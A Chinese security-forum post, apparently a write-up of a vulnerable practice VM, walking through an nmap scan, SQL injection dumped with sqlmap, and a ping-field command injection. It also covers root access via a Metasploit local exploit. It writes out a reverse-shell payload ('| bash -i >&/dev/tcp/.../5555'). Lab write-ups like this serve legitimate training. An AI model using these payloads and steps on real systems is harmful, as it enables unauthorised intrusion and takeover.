用户
搜索
  • TA的每日心情
    奋斗
    昨天 10:06
  • 签到天数: 51 天

    连续签到: 3 天

    [LV.5]常住居民I

    i春秋-见习白帽

    Rank: 3Rank: 3

    29

    主题

    36

    帖子

    1175

    魔法币
    收听
    0
    粉丝
    4
    注册时间
    2020-7-23
    发表于 2020-9-8 16:03:39 03495
    0x00:靶机下载
    看了下描述利用基础知识来得到root权限这个样子
    0.png
    该靶机的难点在于安装如何让kali成功扫到IP。。。。。。同时排除bug一定要下载update千万不要下载original。在做original的时候会遇到一个很恶心的bug

    下载完后解压可以得到一个文件夹
    1.png
    点进去以后可以看到一个.vmx的文件,但是先别双击点开
    2.png
    按住右键用编辑器打开,这里我选择Visual Studio打开来到第45行这里要把Bridged改成NAT然后双击打开
    3.png
    还没完,在网络连接那里首先是默认桥接模式的一定要调回NAT模式,然后点击开始运行,这个时候不知道这个虚拟机咋设置的又跳回桥接模式,所以手速一定要快赶快调回NAT模式
    4.png
    最后花了30分钟终于把IP扫出来了。。。。。。。。
    5.png
    0x01:探测靶机
    得知IP以后开始用nmap探测波端口,主要开了22,80,111,443,620,631和3306端口
    命令:nmap -A -sS -sV -v -p- 192.168.234.140
    6.png
    访问一波IP可以正常访问开搞
    7.png

    0x02:登录界面存在注入
    这里由于是个登录框,破解的方法可以是SQL注入或者可以尝试波用字典进行爆破,这里我偷懒了,直接用burp的active scan扫到存在SQL注入
    8.png

    然后保存到文本里面用sqlmap可以成功跑出来
    9.png
    然后接下来—dbs可以跑出两个数据库名
    10.png
    然而奇怪的事情又发生了。。。。分别跑这两个库你是跑不出来的所以我直接 –dbs 后面直接–dump跑数据,直接跑到两个账号密码
    11.png
    0x03:利用命令执行漏洞getshell
    输入admin的账号密码以后会遇见一个输入框
    12.png
    在里面输入kali的IP会帮你ping一次
    13.png
    经过测试发现|可以绕过,存在命令执行漏洞
    15.png 14.png
    那么提前开启netcat插入一句话,成功反弹
    一句话: 192.168.19.128| bash -i >&/dev/tcp/192.168.19.128/5555 0>&1

    16.png


    0x04:提权
    用sudo-l查看特殊权限,结果需要密码卒,换另外一个查看了Linux版本为CentOS4.5
    17.png
    用MSF搜到一个提权payload
    18.png
    先复制到root目录下然后开启python共享模式传上去
    19.png 20.png

    最后编译一下运行就可以获得root权限了
    21.png

    发新帖
    您需要登录后才可以回帖 登录 | 立即注册